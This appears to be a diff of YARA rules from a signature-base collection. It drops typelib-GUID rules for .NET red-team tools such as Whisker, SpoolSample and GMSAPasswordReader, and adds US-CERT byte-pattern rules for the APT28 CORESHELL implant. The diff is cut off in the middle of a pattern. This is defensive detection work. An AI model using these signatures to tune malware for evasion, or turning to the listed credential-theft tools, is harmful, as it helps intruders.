-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4807-L4820"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "747e4f76-b9c4-5988-90ae-b450548b1b82"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L140-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f675d60987e5791550dff9cccc00109a2e30971de12c7f4c77288cf34122f7f2"
-		score = 75
+		logic_hash = "ebfedcec6f22d802a9980ad533f21e90b77fe929a813850be1b25304d3973c3b"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "2133c634-4139-466e-8983-9a23ec99e01b" ascii wide
+		$STR1 = {C1 EB 07 8D ?? 01 32 1C ?? 33 D2 }
+		$STR2 = {2B ?? 83 ?? 06 0F 83 ?? 00 00 00 EB 02 33 }
+		$STR3 = {89 ?? ?? 89 ?? ?? 89 55 ?? 89 45 ?? 3B ?? 0F 83 ?? 00 00 00 8D
+         ?? ?? 8D ?? ?? FE }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Get_RBCD_Threaded : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V5 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "fdef6dc3-da1a-5a98-a822-94e443981fdd"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/FatRodzianko/Get-RBCD-Threaded"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4822-L4835"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "0e787116-d7f5-5a72-9aba-d4e6cb35bc8d"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L157-L171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a3cb7097f5fd5a2e5eac5ace774ea4e7f845989ee953f5aa140b0e05f3d04380"
-		score = 75
+		logic_hash = "b0929b808f62e3c59c0afbe959ebf67a3a985e0a0a72bcb112c9693a98351555"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "e20dc2ed-6455-4101-9d78-fccac1cb7a18" ascii wide
+		$STR1 = {48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33
+         C9 ff 15 [2] 00 00 ff 15 [2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00
+         00 00 48 8B CC E8}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Whisker : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V6 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ecb0c59f-2111-58d9-8dc9-dfe005cad3be"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/eladshamir/Whisker"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4837-L4850"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "ffadb02f-6311-567d-900b-c8a9ed172ab4"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L173-L186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2d0e0436f83b5e4c4e2e7ef7237d5769a901f35b0462d5396bb5e398a72176dd"
-		score = 75
+		logic_hash = "93ce725a8af03d6f08eafe99ff3984e03a434b1f0071c6dbe560bafc3eefb576"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "42750ac0-1bff-4f25-8c9d-9af144403bad" ascii wide
+		$STR1 = { e8 [2] ff ff 8b [0-6] 00 04 00 00 7F ?? [1-2] 00 02 00 00 7F
+         ?? [1-2] 00 01 00 00 7F ?? [1-2] 80 00 00 00 7F ?? 83 ?? 40 7F}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Shadowspray : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V7 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "91dd52ef-07a1-5ffd-b5c3-59bca18d4c7c"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/Dec0ne/ShadowSpray"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4852-L4865"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "839041d9-e27b-52a2-b5d5-f1af595826f4"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L188-L208"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d45c8c20a782dbcb80db5c990ce02f6227e40a8b6d9875b1158735c5a53d4771"
-		score = 75
+		logic_hash = "dd65443065f044a2956ae51140423dab202effff5f12dd686f6c4fd54d8a4a0b"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "7e47d586-ddc6-4382-848c-5cf0798084e1" ascii wide
+		$s1 = {10 A0 FA FD 83 3D 28 D4 1F FF 77 5? ?8 B4 50 CC 1E B0 78 D7 90 13
+         21 C0 23 3D 28 BC 78 95 DE 4B B0 60 00 00 0F 7F 38 B4 50 C8 D5 9F E0
+         25 DF F3 21 C0 28 BC 13 3D 2B 90 60 00 00 0F 7F 18 B4 50 C8 BC F2 21
+         C0 28 B4 5E 48 B5 5E 00 8D 41 FE 83 F8 06 8B 45 ?? 72 ?? 8B 4D ?? 8B }
+		$s2 = {28 D9 B0 00 00 00 00 FB 65 C0 AF E8 D3 40 28 B4 5? ?0 3C 20 FA FD
+         88 D7 A0 18 D4 2F F3 3D 2F 77 5? ?C 1E B0 78 BC 73 21 C0 A3 3D 2B 90
+         60 00 00 0F 7F 18 A4 D? ?8 B4 50 C8 0E 90 20 24 D? ?3 20 C0 28 B4 5?
+         ?3 3D 2F 77 5? ?8 B4 50 C2 20 C0 28 BD 70 2D 93 01 E8 B4 D0 C8 D4 2F
+         E3 B4 5E 88 B4 5? ?8 95 5? ?7 2A 05 F5 E5 B8 BE 55 DC 20 80 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Malsccm : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V9 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4a88532b-e2bc-5ce9-828d-6ef62d91f6b9"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/nettitude/MalSCCM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4867-L4880"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "41f46b52-4b0e-53ee-a86c-503fe9a9532c"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L210-L236"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "064835e594c8e28903e5e18aa63c8bda53e74ddb3b8eda813ac62c7677b4e3fc"
-		score = 75
+		logic_hash = "5947dbb08c9d0851b7993e5ccf177f97dcb330d4b390833843f69932c921ce7a"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "5439cecd-3bb3-4807-b33f-e4c299b71ca2" ascii wide
+		$STR1 = { 8A C3 02 C0 02 D8 8B 45 F8 02 DB 83 C1 02 03 45 08 88 5D 0F 89
+         45 E8 8B FF 0F B6 5C 0E FE 8B 45 F8 03 C1 0F AF D8 8D 51 01 89 55 F4
+         33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 45 F4 C1 EB 07 32 1C 32 33 D2
+         F7 F7 8A C1 02 45 0F 2C 02 32 04 32 33 D2 88 45 FF 8B C1 8B F7 F7 F6
+         8A 45 FF 8B 75 14 22 04 32 02 D8 8B 45 E8 30 1C 08 8B 4D F4 8D 51 FE
+         3B D7 72 A4 8B 45 E4 8B 7D E0 8B 5D F0 83 45 F8 06 43 89 5D F0 3B D8
+         0F 82 ?? ?? ?? ?? 3B DF 75 13 8D 04 7F 8B 7D 10 03 C0 2B F8 EB 09 33
+         C9 E9 5B FF FF FF 33 FF 3B 7D EC 0F 83 ?? ?? ?? ?? 8B 55 08 8A CB 02
+         C9 8D 04 19 02 C0 88 45 13 8D 04 5B 03 C0 8D 54 10 FE 89 45 E0 8D 4F
+         02 89 55 E4 EB 09 8D 9B 00 00 00 00 8B 45 E0 0F B6 5C 31 FE 8D 44 01
+         FE 0F AF D8 8D 51 01 89 55 0C 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B
+         45 0C C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 13 2C 02 32 04 32 33
+         D2 88 45 0B 8B C1 8B F7 F7 F6 8A 45 0B 8B 75 14 22 04 32 02 D8 8B 45
+         E4 30 1C 01 8B 4D 0C }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Spoolsample : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V10 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "38346575-cf5b-59bf-b2b2-21aacf05b8a4"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/leechristensen/SpoolSample"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4882-L4895"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "cb88ae0c-19e2-590c-9c13-78ac1dcc8c9f"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L238-L251"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8633b34f478b3d581f9403909d2ee20e7049d3ea02ecaf4fcb5dd61909681ba4"
-		score = 75
+		logic_hash = "62d47c1076b05bc9a531ef6e48f17f730932826b4b0f311887e3b14c639b937d"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "640c36b4-f417-4d85-b031-83a9d23c140b" ascii wide
+		$STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8]
+         48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpoxidresolver : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V11 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e8a957bc-3319-51c2-8289-01bd0b8a632a"
-		date = "2023-03-22"
-		modified = "2025-08-15"
-		reference = "https://github.com/S3cur3Th1sSh1t/SharpOxidResolver"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4897-L4910"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "570d6996-ab16-556e-b790-e4c73d7bbffc"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L253-L267"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "168d2d817fecdb9a457af26668f6e543556901151b025d322a4cfd63106cafed"
-		score = 75
+		logic_hash = "72b9e4de0389df3a14f92660e91749dea4d31905eb7391163c3503bc953d661f"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "ce59f8ff-0ecf-41e9-a1fd-1776ca0b703d" ascii wide
+		$STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53
+         56 57 A1 [4] 31 45 F8 33 C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68
+         [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcat : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V14 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "450d13c6-93ae-5bf5-bdde-d874ab6c0cd5"
-		date = "2023-11-30"
-		modified = "2025-08-18"
-		reference = "https://github.com/theart42/Sharpcat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4912-L4924"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "1e4958e7-e136-5600-bc16-36cdeeb3ea18"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L269-L293"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "143757610d66c5d7bbba96ef810d518f38ad8ea0e924be23aa59e8c514154fe0"
-		score = 75
-		quality = 83
+		logic_hash = "4abb1e1c68ced667f04a69c58c89187f9ccc0633c5dc5f396ba8d210bf405f93"
+		score = 85
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "d16fd95f-23ce-4f8d-8763-b9f5a9cdd0c3" ascii nocase wide
+		$STR1 = {8B ?? 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA C1 EE 02 89
+         74 24 58 44 8B ?? 41 F7 ?? 8B CA BA 03 00 00 00 C1 E9 02 89 0C 24 8D
+         04 49 03 C0 44 2B ?? 44 89 ?? 24 04 3B F1 0F 83 ?? 01 00 00 8D 1C 76
+         4C 89 6C 24  }
+		$STR2 = {C5 41 F7 E0 ?? ?? ?? ?? ?? ?? 8D 0C 52 03 C9 2B C1 8B C8 ?? 8D
+         04 ?? 46 0F B6 0C ?? 40 02 C7 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7
+         E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA 46 22 0C ?? 41 8D 48
+         FE F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 8B C1 }
+		$STR3 = {41 F7 E0 C1 EA 02 41 8B C0 8D 0C 52 03 C9 2B C1 8B C8 42 8D 04
+         1B 46 0F B6 0C ?? 40 02 C6 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1
+         C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA }
+		$STR4 = {46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 8B 54 24 58 03
+         C0 2B C8 8B C1 0F B6 4F FF 42 0F B6 04 ?? 41 0F AF CB C1 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpnamedpipepth : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V15 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "561b95a5-f32b-5fe8-9e67-3f702306be93"
-		date = "2023-11-30"
-		modified = "2025-08-18"
-		reference = "https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4926-L4938"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "9bdaebc1-86a0-5c21-b752-d69cdb70f082"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L295-L310"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "437a8a41073174e86f642717537bdeeb5343cc8683c95477a52d6801a46aac21"
-		score = 75
-		quality = 83
+		logic_hash = "fac61e80803941193c41ecf8b3fcbee21b5cc41542989ecd93542c32e87da983"
+		score = 85
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "344ee55a-4e32-46f2-a003-69ad52b55945" ascii nocase wide
+		$XOR_LOOP1 = { 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 }
+		$XOR_LOOP2 = { 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 }
+		$XOR_LOOP3 = { 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharptokenfinder : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V16 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "60fd06be-041b-5fa8-8f25-41b26605ea90"
-		date = "2023-12-06"
-		modified = "2025-08-18"
-		reference = "https://github.com/HuskyHacks/SharpTokenFinder"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4940-L4952"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "2c54a749-c80b-5010-97b6-b74c54fd3d07"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L312-L329"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f9681a13b094b6e05cab69f0684d52e3bb3b465cfcdb1c83a890c9c8fda79169"
-		score = 75
-		quality = 83
+		logic_hash = "638cb66e5ff52ac5a1df0954969e7c54a3b25518228e4f8f344aafe6760985d2"
+		score = 85
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "572804d3-dbd6-450a-be64-2e3cb54fd173" ascii nocase wide
+		$OBF_FUNCT = { 0F B6 1C 0B 8D 34 08 8D 04 0A 0F AF D8 33 D2 8D 41 FF F7
+         75 F8 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06
+         00 00 00 F7 F3 8B 45 0C 8D 59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06
+         00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02 C3 30 06
+         8B 5D F0 8D 41 FE 83 F8 06 8B 45 DC 72 9A }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and $OBF_FUNCT
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharprodc : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V17 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "60779e7a-048f-5095-b853-fd90c4f7449e"
-		date = "2023-12-06"
-		modified = "2025-08-18"
-		reference = "https://github.com/wh0amitz/SharpRODC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4954-L4966"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "dc3a6b08-1ac4-5fa2-a710-657514d45606"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L331-L347"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3d24237804509d2bf241f7310843591608a9d7e8abb38eb324aa5909995ebfaf"
-		score = 75
-		quality = 83
+		logic_hash = "ea2793e6ce9e9d97e70a9452a38eb4d5ddbcc275af6ae7f5d094dc77e112d278"
+		score = 85
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "d305f8a3-019a-4cdf-909c-069d5b483613" ascii nocase wide
+		$STR1 = { 24108b44241c894424148b4424246836 }
+		$STR2 = { 518d4ddc516a018bd08b4de4e8360400 }
+		$STR3 = { e48178061591df75740433f6eb1a8b48 }
+		$STR4 = { 33d2f775f88b45d402d903c641321c3a }
+		$STR5 = { 006a0056ffd083f8ff74646a008d45f8 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Gmsapasswordreader : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V18 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "dc74bfce-90a1-53bd-bfe4-cb7c9c75da53"
-		date = "2023-12-06"
-		modified = "2025-08-18"
-		reference = "https://github.com/rvazarkar/GMSAPasswordReader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4968-L4980"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "5376ec57-f405-55cf-a23b-aafb1cb800e5"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L349-L376"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8db260b15b8b8158e5f66268b9086b456386af017e4351025ea27b9f994e5bf5"
-		score = 75
-		quality = 83
+		logic_hash = "d982b3b1407e140f586772ce409e47bd29e567af41e466cd94d0983c93aab917"
+		score = 85
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0 = "c8112750-972d-4efa-a75b-da9b8a4533c7" ascii nocase wide
+		$STR1 = { 8A C1 02 C0 8D 1C 08 8B 45 F8 02 DB 8D 4A 02 8B 55 0C 88 5D FF
+         8B 5D EC 83 C2 FE 03 D8 89 55 E0 89 5D DC 8D 49 00 03 C1 8D 34 0B 0F
+         B6 1C 0A 0F AF D8 33 D2 8D 41 FF F7 75 F4 8B 45 0C C1 EB 07 8D 79 01
+         32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE
+         02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22
+         1C 02 8B 45 E4 8B 55 E0 02 C3 30 06 8B 5D DC 8D 41 FE 83 F8 06 8B 45
+         F8 72 9B 8B 4D F0 8B 5D D8 8B 7D 08 8B F0 41 83 C6 06 89 4D F0 89 75
+         F8 3B 4D D4 0F 82 ?? ?? ?? ?? 8B 55 E8 3B CB 75 09 8D 04 5B 03 C0 2B
